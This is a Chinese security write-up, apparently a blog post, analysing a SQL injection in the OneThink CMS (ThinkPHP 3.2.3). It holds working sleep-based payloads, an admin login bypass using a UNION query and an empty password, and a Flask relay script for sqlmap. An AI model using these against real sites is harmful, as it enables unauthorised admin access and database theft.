• OneThink前台注入分析


    OneThink前台注入进后台分析
    我是某次授权的渗透过程中,遇到了OneThink,那么经过一番审计和尝试,最终实现了OneThink < 1.1.141212时的任意进后台,之前没有系统审计过tp3系列的注入问题,所以这里也是简单回顾一下对对onethink的前台注入问题审计的过程,各位大佬轻喷~
    OneThink 1.0.131218为例,本地搭建起one.think

    打开源码文件夹,好家伙,踏破铁鞋无觅处,得来全不费工夫——thinkphp3.2.3的框架,那岂不是,

    咱们一起回顾下它sql注入时参数的传递过程

    # OneThinkThinkPHPLibraryThinkModel.class.php #1576L
     public function where($where,$parse=null){//$where=array("username"=>"xxx")
                    ...  
            if(isset($this->options['where'])){
                $this->options['where'] =   array_merge($this->options['where'],$where);//从左到右合并数组到options中
            }else{
                $this->options['where'] =   $where;
            }     
            return $this;
        }
    

    上边简单进行了数组合并,再跟进find(), 将$option变量传入$this->db对象的select函数,

    # OneThinkThinkPHPLibraryThinkModel.class.php #624L
     public function find($options=array()) {
        ...
        $resultSet          =   $this->db->select($options);
        ...
    

    进入select函数,关注到它的里面使用到了buildSelectSql方法

    $options变量的学问就在其中,

    # OneThinkThinkPHPLibraryThinkDb.class.php # 804L
    ...
    protected $selectSql  = 'SELECT%DISTINCT% %FIELD% FROM %TABLE%%JOIN%%WHERE%%GROUP%%HAVING%%ORDER%%LIMIT% %UNION%%COMMENT%';
    ...
    public function buildSelectSql($options=array()) {
        if(isset($options['page'])) {
            // 根据页数计算limit
            ...
        $sql  =     $this->parseSql($this->selectSql,$options);/*关键*/
        ...
    

    这个parseSql里面,起到注入作用,最重要的就是parseWhere方法
    跟进parseWhere方法,425行将$where拆成$``key$``val,在后面几个地方传入parseWhereItem()
    parseKey是一个取值方法,没实际意义

    下面就是注入发生的地方了,好好分析一下这个parseWhereItem()函数

    首先,$val来源于上面的$where变量,是咱们可控的;
    其次,这里正则判断有大问题,没有使用^ $来定界,导致xxINxx这种形式也能通过判断,val[0]IN后面实际可构造出任意内容,后续进行了拼接,导致sql注入。

    # OneThinkThinkPHPLibraryThinkDb.class.php #469L
    protected function parseWhereItem($key,$val) {
         $whereStr = '';
         elseif(preg_match('/IN/i',$val[0])){ // IN 运算
         if(isset($val[2]) && 'exp'==$val[2]) {
             $whereStr .= $key.' '.strtoupper($val[0]).' '.$val[1];
         }else{
             if(is_string($val[1])) {
                  $val[1] =  explode(',',$val[1]);
             }
             $zone      =   implode(',',$this->parseValue($val[1]));
             $whereStr .= $key.' '.strtoupper($val[0]).' ('.$zone.')';
         }
         }elseif(preg_match('/BETWEEN/i',$val[0])){ // BETWEEN运算
             $data = is_string($val[1])? explode(',',$val[1]):$val[1];
             $whereStr .=  ' ('.$key.' '.strtoupper($val[0]).' '.$this->parseValue($data[0]).' AND '.$this->parseValue($data[1]).' )';
         }
    

    那么确定存在注入问题,这里咱们看看前台登录地址处,具体怎么注入

    注入分析

    payload1-in注入

    username[]=in ('')) and (select 1 from (select sleep(4))x)--+-&password=2&verify=0x401
    


    实际执行SQL语句

    SELECT * FROM `onethink_ucenter_member` WHERE ( `username` 
    IN (''))  AND (SELECT 1 FROM (SELECT SLEEP(4))X)-- - () ) LIMIT 1
    

    payload2-exp注入

    username[0]=exp&username[1]=>(select 1 from (select sleep(3))x)&password=2&verify=0x401
    

    实际执行SQL语句

    SELECT * FROM `onethink_ucenter_member` WHERE (  (`username` 
        > (select 1 from (select sleep(3))x))  )
    

    payload3-between注入

    username[0]=BETWEEN 1 and ( select 1 from (select sleep(2))x)))--+-&username[1]=&password=2&verify=0x401
    

    SELECT * FROM `onethink_ucenter_member` WHERE (  (`username` 
        BETWEEN 1 AND ( SELECT 1 FROM (SELECT SLEEP(2))X)))-- - '' AND null ) ) LIMIT 1
    

    ok,现在有了注入,我们就能使用联合查询,来绕过后台用户登录,实现"万能密码"的效果。但在这之前,还需要分析完整的登录逻辑。

    登录逻辑分析

    使用FileMonitor工具,得到后台登录处的SQL语句

    SELECT * FROM `onethink_ucenter_member` WHERE ( `username` = '1' ) LIMIT 1
    

    而数据表onethink_ucenter_member的结构如下图,有11列,那么联合注入就需要构造11个参数union select 1,2,3,4,...,11

    接着发现登录处的链接为http://one.think/index.php?s=/admin/public/login.html,跟入源码

    # OneThinkApplicationAdminControllerPublicController.class.php : 31L
    public function login($username = null, $password = null, $verify = null){
    ...
     $User = new UserApi;
                $uid = $User->login($username, $password);
    ...
    

    跟进UcenterMemberModel类,进入login函数

    # /OneThink/Application/User/Api/UserApi.class.php  #42L
    ...
        protected function _init(){
            $this->model = new UcenterMemberModel();    //初始化
        }
    
    ...
        public function login($username, $password, $type = 1){
            return $this->model->login($username, $password, $type);
        }
    

    继续跟进,发现登录的关键逻辑

    # /OneThink/Application/User/Model/UcenterMemberModel.class.php #148L
    /* 获取用户数据 */
    public function login($username, $password, $type = 1){
        $map = array();
        switch ($type) {
            case 1:
                $map['username'] = $username; //给map数组赋值break;
    ...
    /* 获取用户数据 */
    $user = $this->where($map)->find(); //1 用户名验证if(is_array($user) && $user['status']){
        /* 验证用户密码 */
        if(think_ucenter_md5($password, UC_AUTH_KEY) === $user['password']){2 密码验证$this->updateLogin($user['id']); //更新用户登录信息
            return $user['id']; //登录成功返回用户ID
            } else {
            return -2; //密码错误
            }
    } else {
        return -1; //用户不存在或被禁用
        }
    

    整理知道:一个用户要成功登录,得过两道坎:

    1. 用户名验证。即要通过$username的验证,并使得查询出的$user['status']大于零,所以关注$user = $this->where($map)->find()这一条,跟进where()方法,追到ThinkPHP文件夹下了,这是注入点。
    2. 密码验证。即还要使得think_ucenter_md5($password, UC_AUTH_KEY)等于查询出的$user['password']$password其实就是咱们登陆时输入的密码,我们跟进think_ucenter_md5
      # OneThinkApplicationUserCommoncommon.php #15L
      function think_ucenter_md5($str, $key = 'ThinkUCenter'){
       return '' === $str ? '' : md5(sha1($str) . $key);
      }
      
      得出结论:如果输入值为空值,那么加密函数返回的结果也为空值——舒服了,根本不必用到hash计算嘛!所以密码验证这一步也搞定了,只需要让POST上去的密码为空即可!


      网络不是不法之地。虽然已经可以进后台了,但依然不知道管理员的账号密码,有一些登录界面没有验证码,所以这里再提供一种对接SQLMAP的思路(非改tamper),供大家参考
      ## 对接sqlmap:Flask参数转发
      首先注入点位置如下图inejct.png
    # encoding: utf-8
    # sqli-reverse-flask.py
    from flask import Flask,request,jsonify
    import requests
    
    
    def remote_login(payload):
        '''
        对服务器发起访问请求
        '''
        burp0_url = "http://one.think:80/index.php?s=/admin/public/login.html"
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest"}
        # )) or 1=1 -- -
        pay = ") =' {} ')-- -".format(payload) # )={payload} )1 = 1
        print(pay)
        burp0_data = {"act": "verify", "username[0]": 'exp', "username[1]": pay, "password": "", "verify": ""}
        resp = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)
    
        return resp.text
    
    app = Flask(__name__)
    @app.route('/')
    def login():
        payload =  request.args.get("id")
        print(payload)
        response = remote_login(payload)
        return response
    
    if __name__ == '__main__':
        app.run()
    

    那么经过这个转发脚本,原本复杂的参数被简化,你只需要在本地对http://127.0.0.1:5000/?id=1跑sqlmap即可。原理上其实与写tamper脚本相同,都是让sqlmap能够识别出“简化过的”注入参数。

    python sqlmap.py -u http://127.0.0.1:5000/?id=1  --tech=B --dbms=mysql --batch
    

    reference

  • 相关阅读:
    Spring基于注解整合Redis实现内容缓存
    配置Mybatis二级缓存为Redis来实现内容缓存
    Spring整合Redis
    Java连接redis
    机器学习之 KNN近邻算法(一)入门
    matplotlib 之 快速入门
    Pandas 之入门
    Hadoop 之 环形缓冲区原理
    numpy 之 rollaxis的理解
    python 之 遇到SyntaxError: Non-UTF-8 code starting with 'xb8' in file
  • 原文地址:https://www.cnblogs.com/0daybug/p/13462709.html
Copyright © 2020-2023  润新知